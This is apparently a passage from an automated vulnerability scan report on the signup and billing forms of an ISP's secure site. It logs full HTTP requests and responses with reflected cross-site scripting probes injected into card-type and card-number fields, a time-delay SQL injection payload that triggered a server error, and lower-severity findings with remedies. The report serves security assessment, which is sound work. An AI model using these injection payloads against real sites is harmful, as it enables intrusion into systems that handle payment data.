<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Ronald Smith"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x0016C3)</script>"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , '"--><script>netsparker(0x0016C3)</script></B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> 
</SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /dsl_c2.cgi

/dsl_c2.cgi CONFIRMED

https://secure.gis.net/dsl_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
activationfee POST 3
addinternational POST Add_995_International
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
broadbandphone POST Free_VOIP_Service
CARDTYPE POST '"--><script>alert(0x001748)</script>
CCNUM POST 3
CITY POST 3
COMPANY POST 3
DSL_Installation_Phone POST 3
DSL_Service_Type POST 29.95 Residential 1Mbps with Unlim Phone
dsltotal POST 3
dsltotal1 POST 3
dsltotal2 POST 3
dsltotal3 POST 3
dsltotal4 POST 3
dsltotal5 POST 3
dsltotal6 POST 3
dsltotal7 POST 3
dsltotal8 POST 3
email POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
GalaxyUse POST 3
internationalcalling POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
Name_of_Phone_Company POST Ronald Smith
NAMEONCARD POST Ronald Smith
PHONE POST 3
SOURCE POST 3
STATE POST 3
STREET POST 3
subject POST Combo DSL-VOIP Web Order
tosagree POST agree
totaltotal POST 3
ZIP POST 3

Request

POST /dsl_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dslcombo.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 827
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&activationfee=3&addinternational=Add_995_International&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&broadbandphone=Free_VOIP_Service&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x001748)%3c%2fscript%3e&CCNUM=3&CITY=3&COMPANY=3&DSL_Installation_Phone=3&DSL_Service_Type=29.95+Residential+1Mbps+with+Unlim+Phone&dsltotal=3&dsltotal1=3&dsltotal2=3&dsltotal3=3&dsltotal4=3&dsltotal5=3&dsltotal6=3&dsltotal7=3&dsltotal8=3&email=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&GalaxyUse=3&internationalcalling=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&Name_of_Phone_Company=Ronald+Smith&NAMEONCARD=Ronald+Smith&PHONE=3&SOURCE=3&STATE=3&STREET=3&subject=Combo+DSL-VOIP+Web+Order&tosagree=agree&totaltotal=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:54:50 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x001748)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /dsl_c2.cgi

/dsl_c2.cgi CONFIRMED

https://secure.gis.net/dsl_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST 250 Minute Bundle
activationfee POST 3
addinternational POST Add_995_International
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGSTREET POST 3
BILLINGZIP POST 3
broadbandphone POST Free_VOIP_Service
CARDTYPE POST V
CCNUM POST '"--><script>alert(0x001749)</script>
CITY POST 3
COMPANY POST 3
DSL_Installation_Phone POST 3
DSL_Service_Type POST 29.95 Residential 1Mbps with Unlim Phone
dsltotal POST 3
dsltotal1 POST 3
dsltotal2 POST 3
dsltotal3 POST 3
dsltotal4 POST 3
dsltotal5 POST 3
dsltotal6 POST 3
dsltotal7 POST 3
dsltotal8 POST 3
email POST netsparker@example.com
EXPMONTH POST 3
EXPYEAR POST 3
FIRSTNAME POST Ronald Smith
GalaxyUse POST 3
internationalcalling POST 3
LASTNAME POST Ronald Smith
monthlytotal POST 3
monthlytotal0 POST 3
monthlytotal1 POST 3
monthlytotal2 POST 3
monthlytotal3 POST 3
Name_of_Phone_Company POST Ronald Smith
NAMEONCARD POST Ronald Smith
PHONE POST 3
SOURCE POST 3
STATE POST 3
STREET POST 3
subject POST Combo DSL-VOIP Web Order
tosagree POST agree
totaltotal POST 3
ZIP POST 3

Request

POST /dsl_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dslcombo.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 827
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=250+Minute+Bundle&activationfee=3&addinternational=Add_995_International&BILLINGCITY=3&BILLINGSTATE=3&BILLINGSTREET=3&BILLINGZIP=3&broadbandphone=Free_VOIP_Service&CARDTYPE=V&CCNUM='%22--%3e%3cscript%3enetsparker(0x001749)%3c%2fscript%3e&CITY=3&COMPANY=3&DSL_Installation_Phone=3&DSL_Service_Type=29.95+Residential+1Mbps+with+Unlim+Phone&dsltotal=3&dsltotal1=3&dsltotal2=3&dsltotal3=3&dsltotal4=3&dsltotal5=3&dsltotal6=3&dsltotal7=3&dsltotal8=3&email=netsparker%40example.com&EXPMONTH=3&EXPYEAR=3&FIRSTNAME=Ronald+Smith&GalaxyUse=3&internationalcalling=3&LASTNAME=Ronald+Smith&monthlytotal=3&monthlytotal0=3&monthlytotal1=3&monthlytotal2=3&monthlytotal3=3&Name_of_Phone_Company=Ronald+Smith&NAMEONCARD=Ronald+Smith&PHONE=3&SOURCE=3&STATE=3&STREET=3&subject=Combo+DSL-VOIP+Web+Order&tosagree=agree&totaltotal=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:54:54 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: V <P>'"><script>netsparker(0x001749)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The server responded with an HTTP status 500. This indicates a server-side error; the reasons may vary, and the behaviour should be analysed carefully. If Netsparker is able to find a security issue in the same resource, it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. This might be an indication of a bigger issue such as SQL Injection, or could be the result of poor coding practices.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors. This should be a generic practice that does not disclose further information upon an error. All errors should be handled server side only.
- /dialup2/standard2_c2.cgi

/dialup2/standard2_c2.cgi CONFIRMED

https://secure.gis.net/dialup2/standard2_c2.cgi

Parameters

Parameter Type Value
CARDTYPE POST ';WAITFOR DELAY '0:0:25'--
CITY POST 1
EMAIL POST 1
EXPMONTH POST 3
EXPYEAR POST 3
LOCALPH POST 3
LOGIN POST 3
MAIDENNAME POST Ronald Smith
NAME POST 1
PASSWD POST 3
PHONE POST 1
SOFWARE POST 3
STATE POST 1
STREET POST 1
TYPE POST MasterCard
ZIP POST 1

Request

POST /dialup2/standard2_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/dialup2/standard_c2.cgi
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 196
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

CARDTYPE=%27;WAITFOR%20DELAY%20%270:0:25%27--&CITY=1&EMAIL=1&EXPMONTH=3&EXPYEAR=3&LOCALPH=3&LOGIN=3&MAIDENNAME=Ronald+Smith&NAME=1&PASSWD=3&PHONE=1&SOFWARE=3&STATE=1&STREET=1&TYPE=MasterCard&ZIP=1

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 25 Sep 2010 04:21:17 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Server error!</TITLE><LINK REV="made" HREF="mailto:root@gis.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Server error!</H1><DL><DD> </DL><DL><DD> Error message: <BR>malformed header from script. Bad header=Failed to send message to any : standard2_c2.cgi </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@gis.net">webmaster</A></DL><H2>Error 500</H2><DL><DD><ADDRESS> <A HREF="/">secure.gis.net</A> <BR> <small>Sat Sep 25 00:21:17 2010</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used on shared computers such as those in cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs that store private data and disable autocomplete on them. Fields that hold data such as credit card numbers or CCV codes should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy, and a number of automated tools exist to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Identified Field Name

PASSWD

Request

GET /webhosts/webhost_c2.cgi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: secure.gis.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 01:41:15 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE=""><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE=""><INPUT NAME="STREET" TYPE="HIDDEN" VALUE=""><INPUT NAME="CITY" TYPE="HIDDEN" VALUE=""><INPUT NAME="STATE" TYPE="HIDDEN" VALUE=""><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE=""><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE=""><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE=""><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE=""> <B>Account Type:<BR> , </B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" 
SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /voip/

/voip/ CONFIRMED

https://secure.gis.net/voip/

Request

GET /voip/ HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: secure.gis.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 25 Sep 2010 01:41:10 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Access forbidden!</TITLE><LINK REV="made" HREF="mailto:root@gis.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Access forbidden!</H1><DL><DD> You don't have permission to access the requested object. It is either read-protected or not readable by the server. </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@gis.net">webmaster</A></DL><H2>Error 403</H2><DL><DD><ADDRESS> <A HREF="/">secure.gis.net</A> <BR> <small>Fri Sep 24 21:41:10 2010</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam e-mail engines and brute-force tools. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications, and remove user- or person-specific e-mail addresses from the web site. Should such contact be required, use submission forms for this purpose.

- /voip/

/voip/

https://secure.gis.net/voip/

Found E-mails

root@gis.net

Request

GET /voip/ HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: secure.gis.net
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Date: Sat, 25 Sep 2010 01:41:10 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Access forbidden!</TITLE><LINK REV="made" HREF="mailto:root@gis.net"></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC"><H1>Access forbidden!</H1><DL><DD> You don't have permission to access the requested object. It is either read-protected or not readable by the server. </DL><DL><DD> If you think this is a server error, please contact the <A HREF="mailto:root@gis.net">webmaster</A></DL><H2>Error 403</H2><DL><DD><ADDRESS> <A HREF="/">secure.gis.net</A> <BR> <small>Fri Sep 24 21:41:10 2010</small> <BR> <!-- Set this value to 1 to display server version in all error documents --> </ADDRESS></DL></BODY></HTML>